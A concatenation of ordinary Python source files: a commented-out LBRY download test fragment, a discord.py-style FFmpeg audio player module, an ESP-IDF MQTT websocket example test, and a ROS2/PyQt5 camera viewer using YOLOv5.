# downloader = yield factories[0].make_downloader(metadata, prm.min_blob_data_payment_rate, prm, db_dir)
# defer.returnValue(downloader)
#
# @defer.inlineCallbacks
# def download_file(sd_hash):
# prm = self.session.payment_rate_manager
# sd_blob = yield download_sd_blob(self.session, sd_hash, prm)
# metadata = yield sd_identifier.get_metadata_for_sd_blob(sd_blob)
# downloader = yield make_downloader(metadata, prm)
# downloaders.append(downloader)
# yield downloader.start()
# defer.returnValue(downloader)
#
# def check_md5_sum():
# f = open(os.path.join(db_dir, 'test_file'))
# hashsum = md5()
# hashsum.update(f.read())
# self.assertEqual(hashsum.hexdigest(), "4ca2aafb4101c1e42235aad24fbb83be")
#
# def delete_lbry_file(downloader):
# logging.debug("deleting the file")
# return self.lbry_file_manager.delete_lbry_file(downloader)
#
# def check_lbry_file(downloader):
# d = downloader.status()
#
# def check_status_report(status_report):
# self.assertEqual(status_report.num_known, status_report.num_completed)
# self.assertEqual(status_report.num_known, 3)
#
# d.addCallback(check_status_report)
# return d
#
# @defer.inlineCallbacks
# def start_transfer(sd_hash):
# # download a file, delete it, and download it again
#
# logging.debug("Starting the transfer")
# yield self.session.setup()
# yield add_lbry_file_to_sd_identifier(sd_identifier)
# yield self.lbry_file_manager.setup()
# downloader = yield download_file(sd_hash)
# yield check_md5_sum()
# yield check_lbry_file(downloader)
# yield delete_lbry_file(downloader)
# downloader = yield download_file(sd_hash)
# yield check_lbry_file(downloader)
# yield check_md5_sum()
# yield delete_lbry_file(downloader)
#
# def stop(arg):
# if isinstance(arg, Failure):
# logging.debug("Client is stopping due to an error. Error: %s", arg.getTraceback())
# else:
# logging.debug("Client is stopping normally.")
# kill_event.set()
# logging.debug("Set the kill event")
# d = self.wait_for_event(dead_event, 15)
#
# def print_shutting_down():
# logging.info("Client is shutting down")
#
# d.addCallback(lambda _: print_shutting_down())
# d.addCallback(lambda _: rm_db_and_blob_dir(db_dir, blob_dir))
# d.addCallback(lambda _: arg)
# return d
#
# d = self.wait_for_hash_from_queue(sd_hash_queue)
# d.addCallback(start_transfer)
# d.addBoth(stop)
# return d
|
player.py
|
"""
The MIT License (MIT)
Copyright (c) 2015-2021 Rapptz
Copyright (c) 2021-present Awayume
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
"""
from __future__ import annotations
import threading
import traceback
import subprocess
import audioop
import asyncio
import logging
import shlex
import time
import json
import sys
import re
import io
from typing import Any, Callable, Generic, IO, Optional, TYPE_CHECKING, Tuple, Type, TypeVar, Union
from .errors import ClientException
from .opus import Encoder as OpusEncoder
from .oggparse import OggStream
from .utils import MISSING
if TYPE_CHECKING:
from .voice_client import VoiceClient
AT = TypeVar('AT', bound='AudioSource')
FT = TypeVar('FT', bound='FFmpegOpusAudio')
_log = logging.getLogger(__name__)
__all__ = (
'AudioSource',
'PCMAudio',
'FFmpegAudio',
'FFmpegPCMAudio',
'FFmpegOpusAudio',
'PCMVolumeTransformer',
)
CREATE_NO_WINDOW: int
if sys.platform != 'win32':
CREATE_NO_WINDOW = 0
else:
CREATE_NO_WINDOW = 0x08000000
class AudioSource:
"""Represents an audio stream.
The audio stream can be Opus encoded or not, however if the audio stream
is not Opus encoded then the audio format must be 16-bit 48KHz stereo PCM.
.. warning::
The audio source reads are done in a separate thread.
"""
def read(self) -> bytes:
"""Reads 20ms worth of audio.
Subclasses must implement this.
If the audio is complete, then returning an empty
:term:`py:bytes-like object` to signal this is the way to do so.
If :meth:`~AudioSource.is_opus` method returns ``True``, then it must return
20ms worth of Opus encoded audio. Otherwise, it must be 20ms
worth of 16-bit 48KHz stereo PCM, which is about 3,840 bytes
per frame (20ms worth of audio).
Returns
--------
:class:`bytes`
A bytes like object that represents the PCM or Opus data.
"""
raise NotImplementedError
def is_opus(self) -> bool:
"""Checks if the audio source is already encoded in Opus."""
return False
def cleanup(self) -> None:
"""Called when clean-up is needed to be done.
Useful for clearing buffer data or processes after
it is done playing audio.
"""
pass
def __del__(self) -> None:
self.cleanup()
class PCMAudio(AudioSource):
"""Represents raw 16-bit 48KHz stereo PCM audio source.
Attributes
-----------
stream: :term:`py:file object`
A file-like object that reads byte data representing raw PCM.
"""
def __init__(self, stream: io.BufferedIOBase) -> None:
self.stream: io.BufferedIOBase = stream
def read(self) -> bytes:
ret = self.stream.read(OpusEncoder.FRAME_SIZE)
if len(ret) != OpusEncoder.FRAME_SIZE:
return b''
return ret
class FFmpegAudio(AudioSource):
"""Represents an FFmpeg (or AVConv) based AudioSource.
User created AudioSources using FFmpeg differently from how :class:`FFmpegPCMAudio` and
:class:`FFmpegOpusAudio` work should subclass this.
.. versionadded:: 1.3
"""
def __init__(self, source: Union[str, io.BufferedIOBase], *, executable: str = 'ffmpeg', args: Any, **subprocess_kwargs: Any):
piping = subprocess_kwargs.get('stdin') == subprocess.PIPE
if piping and isinstance(source, str):
raise TypeError("parameter conflict: 'source' parameter cannot be a string when piping to stdin")
args = [executable, *args]
kwargs = {'stdout': subprocess.PIPE}
kwargs.update(subprocess_kwargs)
self._process: subprocess.Popen = self._spawn_process(args, **kwargs)
self._stdout: IO[bytes] = self._process.stdout # type: ignore
self._stdin: Optional[IO[Bytes]] = None
self._pipe_thread: Optional[threading.Thread] = None
if piping:
n = f'popen-stdin-writer:{id(self):#x}'
self._stdin = self._process.stdin
self._pipe_thread = threading.Thread(target=self._pipe_writer, args=(source,), daemon=True, name=n)
self._pipe_thread.start()
def _spawn_process(self, args: Any, **subprocess_kwargs: Any) -> subprocess.Popen:
process = None
try:
process = subprocess.Popen(args, creationflags=CREATE_NO_WINDOW, **subprocess_kwargs)
except FileNotFoundError:
executable = args.partition(' ')[0] if isinstance(args, str) else args[0]
raise ClientException(executable + ' was not found.') from None
except subprocess.SubprocessError as exc:
raise ClientException(f'Popen failed: {exc.__class__.__name__}: {exc}') from exc
else:
return process
def _kill_process(self) -> None:
proc = self._process
if proc is MISSING:
return
_log.info('Preparing to terminate ffmpeg process %s.', proc.pid)
try:
proc.kill()
except Exception:
_log.exception('Ignoring error attempting to kill ffmpeg process %s', proc.pid)
if proc.poll() is None:
_log.info('ffmpeg process %s has not terminated. Waiting to terminate...', proc.pid)
proc.communicate()
_log.info('ffmpeg process %s should have terminated with a return code of %s.', proc.pid, proc.returncode)
else:
_log.info('ffmpeg process %s successfully terminated with return code of %s.', proc.pid, proc.returncode)
def _pipe_writer(self, source: io.BufferedIOBase) -> None:
while self._process:
# arbitrarily large read size
data = source.read(8192)
if not data:
self._process.terminate()
return
try:
self._stdin.write(data)
except Exception:
_log.debug('Write error for %s, this is probably not a problem', self, exc_info=True)
# at this point the source data is either exhausted or the process is fubar
self._process.terminate()
return
def cleanup(self) -> None:
self._kill_process()
self._process = self._stdout = self._stdin = MISSING
class FFmpegPCMAudio(FFmpegAudio):
"""An audio source from FFmpeg (or AVConv).
This launches a sub-process to a specific input file given.
.. warning::
You must have the ffmpeg or avconv executable in your path environment
variable in order for this to work.
Parameters
------------
source: Union[:class:`str`, :class:`io.BufferedIOBase`]
The input that ffmpeg will take and convert to PCM bytes.
If ``pipe`` is ``True`` then this is a file-like object that is
passed to the stdin of ffmpeg.
executable: :class:`str`
The executable name (and path) to use. Defaults to ``ffmpeg``.
pipe: :class:`bool`
If ``True``, denotes that ``source`` parameter will be passed
to the stdin of ffmpeg. Defaults to ``False``.
stderr: Optional[:term:`py:file object`]
A file-like object to pass to the Popen constructor.
Could also be an instance of ``subprocess.PIPE``.
before_options: Optional[:class:`str`]
Extra command line arguments to pass to ffmpeg before the ``-i`` flag.
options: Optional[:class:`str`]
Extra command line arguments to pass to ffmpeg after the ``-i`` flag.
Raises
--------
ClientException
The subprocess failed to be created.
"""
def __init__(
self,
source: Union[str, io.BufferedIOBase],
*,
executable: str = 'ffmpeg',
pipe: bool = False,
stderr: Optional[IO[str]] = None,
before_options: Optional[str] = None,
options: Optional[str] = None
) -> None:
args = []
subprocess_kwargs = {'stdin': subprocess.PIPE if pipe else subprocess.DEVNULL, 'stderr': stderr}
if isinstance(before_options, str):
args.extend(shlex.split(before_options))
args.append('-i')
args.append('-' if pipe else source)
args.extend(('-f', 's16le', '-ar', '48000', '-ac', '2', '-loglevel', 'warning'))
if isinstance(options, str):
args.extend(shlex.split(options))
args.append('pipe:1')
super().__init__(source, executable=executable, args=args, **subprocess_kwargs)
def read(self) -> bytes:
ret = self._stdout.read(OpusEncoder.FRAME_SIZE)
if len(ret) != OpusEncoder.FRAME_SIZE:
return b''
return ret
def is_opus(self) -> bool:
return False
class FFmpegOpusAudio(FFmpegAudio):
"""An audio source from FFmpeg (or AVConv).
This launches a sub-process to a specific input file given. However, rather than
producing PCM packets like :class:`FFmpegPCMAudio` does that need to be encoded to
Opus, this class produces Opus packets, skipping the encoding step done by the library.
Alternatively, instead of instantiating this class directly, you can use
:meth:`FFmpegOpusAudio.from_probe` to probe for bitrate and codec information. This
can be used to opportunistically skip pointless re-encoding of existing Opus audio data
for a boost in performance at the cost of a short initial delay to gather the information.
The same can be achieved by passing ``copy`` to the ``codec`` parameter, but only if you
know that the input source is Opus encoded beforehand.
.. versionadded:: 1.3
.. warning::
You must have the ffmpeg or avconv executable in your path environment
variable in order for this to work.
Parameters
------------
source: Union[:class:`str`, :class:`io.BufferedIOBase`]
The input that ffmpeg will take and convert to Opus bytes.
If ``pipe`` is ``True`` then this is a file-like object that is
passed to the stdin of ffmpeg.
bitrate: :class:`int`
The bitrate in kbps to encode the output to. Defaults to ``128``.
codec: Optional[:class:`str`]
The codec to use to encode the audio data. Normally this would be
just ``libopus``, but is used by :meth:`FFmpegOpusAudio.from_probe` to
opportunistically skip pointlessly re-encoding Opus audio data by passing
``copy`` as the codec value. Any values other than ``copy``, ``opus``, or
``libopus`` will be considered ``libopus``. Defaults to ``libopus``.
.. warning::
Do not provide this parameter unless you are certain that the audio input is
already Opus encoded. For typical use :meth:`FFmpegOpusAudio.from_probe`
should be used to determine the proper value for this parameter.
executable: :class:`str`
The executable name (and path) to use. Defaults to ``ffmpeg``.
pipe: :class:`bool`
If ``True``, denotes that ``source`` parameter will be passed
to the stdin of ffmpeg. Defaults to ``False``.
stderr: Optional[:term:`py:file object`]
A file-like object to pass to the Popen constructor.
Could also be an instance of ``subprocess.PIPE``.
before_options: Optional[:class:`str`]
Extra command line arguments to pass to ffmpeg before the ``-i`` flag.
options: Optional[:class:`str`]
Extra command line arguments to pass to ffmpeg after the ``-i`` flag.
Raises
--------
ClientException
The subprocess failed to be created.
"""
def __init__(
self,
source: Union[str, io.BufferedIOBase],
*,
bitrate: int = 128,
codec: Optional[str] = None,
executable: str = 'ffmpeg',
pipe=False,
stderr=None,
before_options=None,
options=None,
) -> None:
args = []
subprocess_kwargs = {'stdin': subprocess.PIPE if pipe else subprocess.DEVNULL, 'stderr': stderr}
if isinstance(before_options, str):
args.extend(shlex.split(before_options))
args.append('-i')
args.append('-' if pipe else source)
codec = 'copy' if codec in ('opus', 'libopus') else 'libopus'
args.extend(('-map_metadata', '-1',
'-f', 'opus',
'-c:a', codec,
'-ar', '48000',
'-ac', '2',
'-b:a', f'{bitrate}k',
'-loglevel', 'warning'))
if isinstance(options, str):
args.extend(shlex.split(options))
args.append('pipe:1')
super().__init__(source, executable=executable, args=args, **subprocess_kwargs)
self._packet_iter = OggStream(self._stdout).iter_packets()
@classmethod
async def from_probe(
cls: Type[FT],
source: str,
*,
method: Optional[Union[str, Callable[[str, str], Tuple[Optional[str], Optional[int]]]]] = None,
**kwargs: Any,
) -> FT:
"""|coro|
A factory method that creates a :class:`FFmpegOpusAudio` after probing
the input source for audio codec and bitrate information.
Examples
----------
Use this function to create an :class:`FFmpegOpusAudio` instance instead of the constructor: ::
source = await discord.FFmpegOpusAudio.from_probe("song.webm")
voice_client.play(source)
If you are on Windows and don't have ffprobe installed, use the ``fallback`` method
to probe using ffmpeg instead: ::
source = await discord.FFmpegOpusAudio.from_probe("song.webm", method='fallback')
voice_client.play(source)
Using a custom method of determining codec and bitrate: ::
def custom_probe(source, executable):
# some analysis code here
return codec, bitrate
source = await discord.FFmpegOpusAudio.from_probe("song.webm", method=custom_probe)
voice_client.play(source)
Parameters
------------
source
Identical to the ``source`` parameter for the constructor.
method: Optional[Union[:class:`str`, Callable[:class:`str`, :class:`str`]]]
The probing method used to determine bitrate and codec information. As a string, valid
values are ``native`` to use ffprobe (or avprobe) and ``fallback`` to use ffmpeg
(or avconv). As a callable, it must take two string arguments, ``source`` and
``executable``. Both parameters are the same values passed to this factory function.
``executable`` will default to ``ffmpeg`` if not provided as a keyword argument.
kwargs
The remaining parameters to be passed to the :class:`FFmpegOpusAudio` constructor,
excluding ``bitrate`` and ``codec``.
Raises
--------
AttributeError
Invalid probe method, must be ``'native'`` or ``'fallback'``.
TypeError
Invalid value for ``probe`` parameter, must be :class:`str` or a callable.
Returns
--------
:class:`FFmpegOpusAudio`
An instance of this class.
"""
executable = kwargs.get('executable')
codec, bitrate = await cls.probe(source, method=method, executable=executable)
return cls(source, bitrate=bitrate, codec=codec, **kwargs) # type: ignore
@classmethod
async def probe(
cls,
source: str,
*,
method: Optional[Union[str, Callable[[str, str], Tuple[Optional[str], Optional[int]]]]] = None,
executable: Optional[str] = None,
) -> Tuple[Optional[str], Optional[int]]:
"""|coro|
Probes the input source for bitrate and codec information.
Parameters
------------
source
Identical to the ``source`` parameter for :class:`FFmpegOpusAudio`.
method
Identical to the ``method`` parameter for :meth:`FFmpegOpusAudio.from_probe`.
executable: :class:`str`
Identical to the ``executable`` parameter for :class:`FFmpegOpusAudio`.
Raises
--------
AttributeError
Invalid probe method, must be ``'native'`` or ``'fallback'``.
TypeError
Invalid value for ``probe`` parameter, must be :class:`str` or a callable.
Returns
---------
Optional[Tuple[Optional[:class:`str`], Optional[:class:`int`]]]
A 2-tuple with the codec and bitrate of the input source.
"""
method = method or 'native'
executable = executable or 'ffmpeg'
probefunc = fallback = None
if isinstance(method, str):
probefunc = getattr(cls, '_probe_codec_' + method, None)
if probefunc is None:
raise AttributeError(f"Invalid probe method {method!r}")
if probefunc is cls._probe_codec_native:
fallback = cls._probe_codec_fallback
elif callable(method):
probefunc = method
fallback = cls._probe_codec_fallback
else:
raise TypeError("Expected str or callable for parameter 'probe', " \
f"not '{method.__class__.__name__}'")
codec = bitrate = None
loop = asyncio.get_event_loop()
try:
codec, bitrate = await loop.run_in_executor(None, lambda: probefunc(source, executable)) # type: ignore
except Exception:
if not fallback:
_log.exception("Probe '%s' using '%s' failed", method, executable)
return # type: ignore
_log.exception("Probe '%s' using '%s' failed, trying fallback", method, executable)
try:
codec, bitrate = await loop.run_in_executor(None, lambda: fallback(source, executable)) # type: ignore
except Exception:
_log.exception("Fallback probe using '%s' failed", executable)
else:
_log.info("Fallback probe found codec=%s, bitrate=%s", codec, bitrate)
else:
_log.info("Probe found codec=%s, bitrate=%s", codec, bitrate)
finally:
return codec, bitrate
@staticmethod
def _probe_codec_native(source, executable: str = 'ffmpeg') -> Tuple[Optional[str], Optional[int]]:
exe = executable[:2] + 'probe' if executable in ('ffmpeg', 'avconv') else executable
args = [exe, '-v', 'quiet', '-print_format', 'json', '-show_streams', '-select_streams', 'a:0', source]
output = subprocess.check_output(args, timeout=20)
codec = bitrate = None
if output:
data = json.loads(output)
streamdata = data['streams'][0]
codec = streamdata.get('codec_name')
bitrate = int(streamdata.get('bit_rate', 0))
bitrate = max(round(bitrate/1000), 512)
return codec, bitrate
@staticmethod
def _probe_codec_fallback(source, executable: str = 'ffmpeg') -> Tuple[Optional[str], Optional[int]]:
args = [executable, '-hide_banner', '-i', source]
proc = subprocess.Popen(args, creationflags=CREATE_NO_WINDOW, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out, _ = proc.communicate(timeout=20)
output = out.decode('utf8')
codec = bitrate = None
codec_match = re.search(r"Stream #0.*?Audio: (\w+)", output)
if codec_match:
codec = codec_match.group(1)
br_match = re.search(r"(\d+) [kK]b/s", output)
if br_match:
bitrate = max(int(br_match.group(1)), 512)
return codec, bitrate
def read(self) -> bytes:
return next(self._packet_iter, b'')
def is_opus(self) -> bool:
return True
class PCMVolumeTransformer(AudioSource, Generic[AT]):
"""Transforms a previous :class:`AudioSource` to have volume controls.
This does not work on audio sources that have :meth:`AudioSource.is_opus`
set to ``True``.
Parameters
------------
original: :class:`AudioSource`
The original AudioSource to transform.
volume: :class:`float`
The initial volume to set it to.
See :attr:`volume` for more info.
Raises
-------
TypeError
Not an audio source.
ClientException
The audio source is opus encoded.
"""
def __init__(self, original: AT, volume: float = 1.0):
if not isinstance(original, AudioSource):
raise TypeError(f'expected AudioSource not {original.__class__.__name__}.')
if original.is_opus():
raise ClientException('AudioSource must not be Opus encoded.')
self.original: AT = original
self.volume = volume
@property
def volume(self) -> float:
"""Retrieves or sets the volume as a floating point percentage (e.g. ``1.0`` for 100%)."""
return self._volume
@volume.setter
def volume(self, value: float) -> None:
self._volume = max(value, 0.0)
def cleanup(self) -> None:
self.original.cleanup()
def read(self) -> bytes:
ret = self.original.read()
return audioop.mul(ret, 2, min(self._volume, 2.0))
class AudioPlayer(threading.Thread):
DELAY: float = OpusEncoder.FRAME_LENGTH / 1000.0
def __init__(self, source: AudioSource, client: VoiceClient, *, after=None):
threading.Thread.__init__(self)
self.daemon: bool = True
self.source: AudioSource = source
self.client: VoiceClient = client
self.after: Optional[Callable[[Optional[Exception]], Any]] = after
self._end: threading.Event = threading.Event()
self._resumed: threading.Event = threading.Event()
self._resumed.set() # we are not paused
self._current_error: Optional[Exception] = None
self._connected: threading.Event = client._connected
self._lock: threading.Lock = threading.Lock()
if after is not None and not callable(after):
raise TypeError('Expected a callable for the "after" parameter.')
def _do_run(self) -> None:
self.loops = 0
self._start = time.perf_counter()
# getattr lookup speed ups
play_audio = self.client.send_audio_packet
self._speak(True)
while not self._end.is_set():
# are we paused?
if not self._resumed.is_set():
# wait until we aren't
self._resumed.wait()
continue
# are we disconnected from voice?
if not self._connected.is_set():
# wait until we are connected
self._connected.wait()
# reset our internal data
self.loops = 0
self._start = time.perf_counter()
self.loops += 1
data = self.source.read()
if not data:
self.stop()
break
play_audio(data, encode=not self.source.is_opus())
next_time = self._start + self.DELAY * self.loops
delay = max(0, self.DELAY + (next_time - time.perf_counter()))
time.sleep(delay)
def run(self) -> None:
try:
self._do_run()
except Exception as exc:
self._current_error = exc
self.stop()
finally:
self.source.cleanup()
self._call_after()
def _call_after(self) -> None:
error = self._current_error
if self.after is not None:
try:
self.after(error)
except Exception as exc:
_log.exception('Calling the after function failed.')
exc.__context__ = error
traceback.print_exception(type(exc), exc, exc.__traceback__)
elif error:
msg = f'Exception in voice thread {self.name}'
_log.exception(msg, exc_info=error)
print(msg, file=sys.stderr)
traceback.print_exception(type(error), error, error.__traceback__)
def stop(self) -> None:
self._end.set()
self._resumed.set()
self._speak(False)
def pause(self, *, update_speaking: bool = True) -> None:
self._resumed.clear()
if update_speaking:
self._speak(False)
def resume(self, *, update_speaking: bool = True) -> None:
self.loops = 0
self._start = time.perf_counter()
self._resumed.set()
if update_speaking:
self._speak(True)
def is_playing(self) -> bool:
return self._resumed.is_set() and not self._end.is_set()
def is_paused(self) -> bool:
return not self._end.is_set() and not self._resumed.is_set()
def _set_source(self, source: AudioSource) -> None:
with self._lock:
self.pause(update_speaking=False)
self.source = source
self.resume(update_speaking=False)
def _speak(self, speaking: bool) -> None:
try:
asyncio.run_coroutine_threadsafe(self.client.ws.speak(speaking), self.client.loop)
except Exception as e:
_log.info("Speaking call in player failed: %s", e)
|
mqtt_ws_example_test.py
|
from __future__ import print_function
from __future__ import unicode_literals
from builtins import str
import re
import os
import sys
import paho.mqtt.client as mqtt
from threading import Thread, Event
try:
import IDF
from IDF.IDFDUT import ESP32DUT
except Exception:
# this is a test case write with tiny-test-fw.
# to run test cases outside tiny-test-fw,
# we need to set environment variable `TEST_FW_PATH`,
# then get and insert `TEST_FW_PATH` to sys path before import FW module
test_fw_path = os.getenv("TEST_FW_PATH")
if test_fw_path and test_fw_path not in sys.path:
sys.path.insert(0, test_fw_path)
import IDF
import DUT
event_client_connected = Event()
event_stop_client = Event()
event_client_received_correct = Event()
message_log = ""
# The callback for when the client receives a CONNACK response from the server.
def on_connect(client, userdata, flags, rc):
print("Connected with result code " + str(rc))
event_client_connected.set()
client.subscribe("/topic/qos0")
def mqtt_client_task(client):
while not event_stop_client.is_set():
client.loop()
# The callback for when a PUBLISH message is received from the server.
def on_message(client, userdata, msg):
global message_log
payload = msg.payload.decode()
if not event_client_received_correct.is_set() and payload == "data":
client.publish("/topic/qos0", "data_to_esp32")
if msg.topic == "/topic/qos0" and payload == "data":
event_client_received_correct.set()
message_log += "Received data:" + msg.topic + " " + payload + "\n"
@IDF.idf_example_test(env_tag="Example_WIFI")
def test_examples_protocol_mqtt_ws(env, extra_data):
broker_url = ""
broker_port = 0
"""
steps: |
1. join AP and connects to ws broker
2. Test connects a client to the same broker
3. Test evaluates it received correct qos0 message
4. Test ESP32 client received correct qos0 message
"""
dut1 = env.get_dut("mqtt_websocket", "examples/protocols/mqtt/ws", dut_class=ESP32DUT)
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, "mqtt_websocket.bin")
bin_size = os.path.getsize(binary_file)
IDF.log_performance("mqtt_websocket_bin_size", "{}KB".format(bin_size // 1024))
IDF.check_performance("mqtt_websocket_size", bin_size // 1024)
# Look for host:port in sdkconfig
try:
value = re.search(r'\:\/\/([^:]+)\:([0-9]+)', dut1.app.get_sdkconfig()["CONFIG_BROKER_URI"])
broker_url = value.group(1)
broker_port = int(value.group(2))
except Exception:
print('ENV_TEST_FAILURE: Cannot find broker url in sdkconfig')
raise
client = None
# 1. Test connects to a broker
try:
client = mqtt.Client(transport="websockets")
client.on_connect = on_connect
client.on_message = on_message
print("Connecting...")
client.connect(broker_url, broker_port, 60)
except Exception:
print("ENV_TEST_FAILURE: Unexpected error while connecting to broker {}: {}:".format(broker_url, sys.exc_info()[0]))
raise
# Starting a py-client in a separate thread
thread1 = Thread(target=mqtt_client_task, args=(client,))
thread1.start()
try:
print("Connecting py-client to broker {}:{}...".format(broker_url, broker_port))
if not event_client_connected.wait(timeout=30):
raise ValueError("ENV_TEST_FAILURE: Test script cannot connect to broker: {}".format(broker_url))
dut1.start_app()
try:
ip_address = dut1.expect(re.compile(r" sta ip: ([^,]+),"), timeout=30)
print("Connected to AP with IP: {}".format(ip_address))
except DUT.ExpectTimeout:
print('ENV_TEST_FAILURE: Cannot connect to AP')
raise
print("Checking py-client received msg published from esp...")
if not event_client_received_correct.wait(timeout=30):
raise ValueError('Wrong data received, msg log: {}'.format(message_log))
print("Checking esp-client received msg published from py-client...")
dut1.expect(re.compile(r"DATA=data_to_esp32"), timeout=30)
finally:
event_stop_client.set()
thread1.join()
if __name__ == '__main__':
test_examples_protocol_mqtt_ws()
|
get_frame.py
|
from concurrent.futures import wait
import rclpy
from rclpy.node import Node
from rclpy.executors import SingleThreadedExecutor
from cv_bridge import CvBridge, CvBridgeError
from sensor_msgs.msg import Image
from Ui_untitled import Ui_MainWindow
from PyQt5 import QtWidgets,QtCore
from PyQt5.QtWidgets import *
from PyQt5.QtCore import *
from PyQt5.QtGui import *
import sys
import cv2
import time
import torch
import numpy as np
from threading import Thread
class MainWindow(QtWidgets.QMainWindow):
def __init__(self):
super().__init__() # 繼承QMainWindow的init
self.ui = Ui_MainWindow() # 建立UI介面物件
self.ui.setupUi(self) # 執行setupUi
self.camera = False # camera flag 用來判斷相機是否打開
self.detect = False # detect falg 用來判斷是否要使用yolov5做物件偵測
"""
stream_video_thread:
UI介面上的相機畫面必須在額外的線程執行,這樣才不會阻塞原本UI介面的線程
"""
self.stream_video_thread = StreamVideoThread() # 建立StreamVideoThread物件
self.stream_video_thread.img.connect(self.show_frame) # 將img值傳到show_frame涵式
self.stream_video_thread.fps.connect(self.update_fps) # 將fps值傳到show_frame涵式
self.stream_video_thread.delay.connect(self.update_delay) # 將delay值傳到show_frame涵式
self.stream_video_thread.start() # 開始執行StreamVideoThread線程
"""
count_time_thread:
建立一個用來計時的線程
"""
self.count_time_thread = Thread(target = self.count_time) #建立一個count_time_thread物件
self.count_time_thread.start() #開始執行count_time_thread線程
"""
btn_connect:
在初始化的時候建立UI介面上按鈕按下時所要觸發的對象
"""
self.btn_connect() # 執行btn_connect涵式
"""
使用torch從torch hub匯入yolov5程式和yolov5s模型,並且使用GPU裝置
"""
self.model = torch.hub.load('ultralytics/yolov5', 'yolov5s',device='0', force_reload=True) # 建立yolov5物件
"""
btn_connect:
設置UI介面上按鈕元件所要觸發的函數
"""
def btn_connect(self):
self.ui.camera_btn.clicked.connect(self.open_stream) # 當UI介面上的camera_btn物件被點擊時呼叫open_stream
self.ui.detect_checkbox.clicked.connect(self.checkbox_click_event) # 當UI介面上的detect_checkbox物件被點擊時呼叫checkbox_click_event
"""
checkbox_click_event:
當checkbox勾選時會進入checkbox_click_event函數,然後再判斷checkbox的狀態做對應的事
"""
def checkbox_click_event(self):
if self.ui.detect_checkbox.isChecked():
self.detect = True
else:
self.detect = False
"""
update_fps:
當camera的flag為"true"的時後設置UI介面上的fps_value物件的text屬性的值為fps值
當camera的flag為"false"的時後設置UI介面上的fps_value物件的text屬性的值為0
"""
def update_fps(self,fps):
if self.camera:
self.ui.fps_value.setText(str(fps))
else:
self.ui.fps_value.setText(str(0))
"""
update_delay:
當camera的flag為"true"的時後設置UI介面上的delay_value物件的text屬性的值為delay值
當camera的flag為"false"的時後設置UI介面上的delay_value物件的text屬性的值為0
"""
def update_delay(self,delay):
if self.camera:
self.ui.delay_value.setText(str(delay)+"ms")
else:
self.ui.delay_value.setText(str(0)+"ms")
"""
open_stream:
當camera的falg為"true"的時後則
當camera的falg為"false"的時後則
"""
def open_stream(self):
if not self.camera:
self.ui.detect_checkbox.setCheckable(True)
self.camera = True
else:
self.ui.detect_checkbox.setCheckable(False)
self.ui.detect_checkbox.setCheckState(False)
self.camera = False
"""
count_time:
當camera的flag為"true"的時後則計算時間,並且將time_value物件的text屬性設為計算後的值
當camera的flag為"false"的時後設置UI介面的time_value物件的text屬性為"00:00"
"""
def count_time(self):
s = 0
m = 0
while True:
if self.camera:
min, s = divmod(s, 60)
if min == 1:m+=1
self.ui.time_value.setText('{:02d}:{:02d}'.format(m, s))
s += 1
else:
self.ui.time_value.setText("00:00")
s = 0
m = 0
time.sleep(1)
"""
window_proportion:
先判斷camera的flag,
當camera的flag為"true"則再判斷detect的flag
當detect的flag為"true"則將影像傳入yolov5物件內做物件偵測,再將物件偵測後的影像透過cv2的resize將影像的解析度設置為640x480
當detect的flag為"false"則將影像直接透過cv2的resize將影像的解析度設置為640x480
當camera的flag為"false"則用numpy產生雜訊畫面
"""
def window_proportion(self,img):
w,h,_ = img.shape # 取得影像的寬、高和通道數
if self.camera:
if self.detect:
img = self.model(img)
img = img.render()[0]
img = cv2.resize(img,(640,480))
else :
img = np.random.randint(255, size=(640, 480, 3),dtype=np.uint8)
return img ,w ,h
"""
show_frame:
將影像設置在UI介面上的view_label上顯示,並且設置UI介面上resultion_value的text值
"""
def show_frame(self,img):
try:
img, w, h = self.window_proportion(img) # 使用window_proportion將影像轉成
img = cv2.cvtColor(img,cv2.COLOR_BGR2RGB) # 使用cv2的cvtColor將影像通道從BGR改成RGB
img = QImage(img,w,h,3*w,QImage.Format_RGB888) # 使用QT的QImage將影像的格式改成Format_RGB888
self.ui.view_label.setGeometry(10,10,w+2,h+2) # 設置UI介面的view_label的大小
self.ui.view_label.setPixmap(QPixmap.fromImage(img)) # 將影像設置在UI介面上的view_label顯示
self.ui.resultion_value.setText(f"{w}X{h}") # 設置UI介面上的resultion_value為w值和h值
except KeyboardInterrupt:
sys.exit()
class StreamVideoThread(QThread):
img = QtCore.pyqtSignal(np.ndarray)
fps = QtCore.pyqtSignal(int)
delay = QtCore.pyqtSignal(float)
def __init__(self):
super().__init__() # 繼承QThread的init
rclpy.init() # rclpy初始化
self.get_frame_node = GetFrameNode() #建立GetFrameNode物件
exe = SingleThreadedExecutor() # 建立SingleThreadedExecutor物件
exe.add_node(self.get_frame_node) # 把SingleThreadedExecutor新增get_frame_node物件
self.get_img_thread = Thread(target=exe.spin,daemon=True) # 建立get_img_thread物件
self.get_img_thread.start() # 開始get_img_thread線程
def run(self):
try:
while True:
img = self.get_frame_node.get_frames() # 將get_frame_node的get_frame函數回傳的影像放到img
fps = self.get_frame_node.fps # 將get_frame_node的fps值放到fps
delay = self.get_frame_node.delay # 將get_frame_node的delay值放到delay
self.img.emit(img) # 發射影像到
self.fps.emit(fps) # 發射影像到
self.delay.emit(delay)# 發射影像到
time.sleep(0.1)
except KeyboardInterrupt:
sys.exit()
class GetFrameNode(Node):
def __init__(self):
super().__init__("jason_ros") # 繼承Node類的init,並設置ros節點名稱為Jason_ros
